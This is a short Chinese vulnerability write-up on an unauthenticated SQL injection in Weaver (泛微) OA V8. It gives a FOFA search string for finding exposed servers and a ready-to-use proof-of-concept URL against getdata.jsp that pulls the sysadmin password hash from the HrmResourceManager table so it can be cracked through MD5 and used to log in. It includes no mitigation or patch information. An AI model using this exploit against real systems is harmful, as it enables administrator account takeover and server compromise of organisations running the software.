泛微OA8前台SQL注入
0x00漏洞描述
泛微OA V8 存在SQL注入漏洞,攻击者可以通过漏洞获取管理员权限和服务器权限
0x01漏洞影响
泛微OA V8
0x02FOFA
app=“泛微-协同办公OA”
0x03漏洞复现
在浏览器中,构造测试URL:x.x.x.x
http://x.x.x.x/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select 38438 as id
出现上面情况证实存在漏洞
POC:
http://xxx.xxx.xxx.xxx/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager
查询HrmResourceManager表中的password字段,页面中返回了数据库第一条记录的值(sysadmin用户的password)通过md5解密即可得到密码
成功登陆
参考链接
https://blog.csdn.net/weixin_43227251/article/details/115653646
请登录后查看回复内容